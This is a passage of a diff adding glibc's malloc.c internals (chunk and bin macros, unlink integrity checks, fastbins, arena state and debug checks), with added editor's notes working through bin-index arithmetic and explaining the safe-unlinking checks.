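+     chunksize (p)        == 0x90    (flag bits masked off)
+     prev_inuse (p)       != 0       (P bit 0x1 set)
+     chunk_is_mmapped (p) == 0       (M bit 0x2 clear)
+     chunk_main_arena (p) == 0       (A bit 0x4 set)
+
+   i.e. a 0x90-byte chunk in a non-main arena whose lower neighbour is
+   allocated.  */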
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4-byte
+   pointers and size_t).
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
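+
+/* Editor's note (illustrative, not upstream): the bins[] array stores only
+   fd/bk pairs, and bin_at() fakes up a chunk pointer over them.  On a
+   64-bit build offsetof (struct malloc_chunk, fd) == 0x10, so
+
+     bin_at (av, 1) == (mbinptr) ((char *) &av->bins[0] - 0x10)
+
+   and bin_at (av, 1)->fd / ->bk land exactly on bins[0] / bins[1].  The
+   fake header overlaps the preceding malloc_state fields, which is
+   harmless because only the fd/bk of a bin header are ever accessed.
+   An empty bin has first (b) == last (b) == b.  */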
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
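+
+/* Editor's note -- example indices for a 64-bit build (SIZE_SZ == 8,
+   SMALLBIN_WIDTH == 16); illustrative only, not upstream:
+
+     bin_index (0x20)  == smallbin_index (0x20)     == 2
+     bin_index (0x90)  == smallbin_index (0x90)     == 9
+     bin_index (0x3f0) == smallbin_index (0x3f0)    == 63
+     bin_index (0x400) == largebin_index_64 (0x400) == 48 + (0x400 >> 6) == 64
+
+   Small bins therefore cover chunk sizes 0x20 .. 0x3f0 and the large
+   bins start at bin 64 with 0x400-byte chunks.  */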
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
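+
+/* Editor's note (not upstream): the two malloc_printerr checks above are
+   the "safe unlinking" integrity checks.  Together they mean a chunk can
+   only be unlinked if its size matches the next chunk's prev_size and its
+   fd/bk point at memory that itself points back at the chunk -- the
+   constraint that the classic unsafe-unlink technique has to satisfy.  */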
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even on a 64-bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
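+
+/* Editor's note -- worked example, illustrative only: for bin index 70,
+
+     idx2block (70) == 70 >> 5         == 2
+     idx2bit (70)   == 1U << (70 & 31) == 1U << 6 == 0x40
+
+   so mark_bin (m, 70) sets bit 6 of binmap[2]; with NBINS == 128 the
+   whole map fits in BINMAPSIZE == 4 32-bit words.  */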
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
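+
+/* Editor's note -- worked numbers for a 64-bit build (SIZE_SZ == 8);
+   illustrative only, not upstream:
+
+     fastbin_index (0x20) == (0x20 >> 4) - 2 == 0
+     fastbin_index (0x80) == (0x80 >> 4) - 2 == 6
+     MAX_FAST_SIZE        == 80 * 8 / 4      == 0xa0
+     NFASTBINS            == fastbin_index (request2size (0xa0)) + 1 == 10
+
+   The limit actually used at run time is set in malloc_init_state ()
+   via set_max_fast (DEFAULT_MXFAST), which on such a build works out to
+   0x80, so by default only chunks of size 0x20 .. 0x80 are eligible for
+   the fastbins.  */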
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
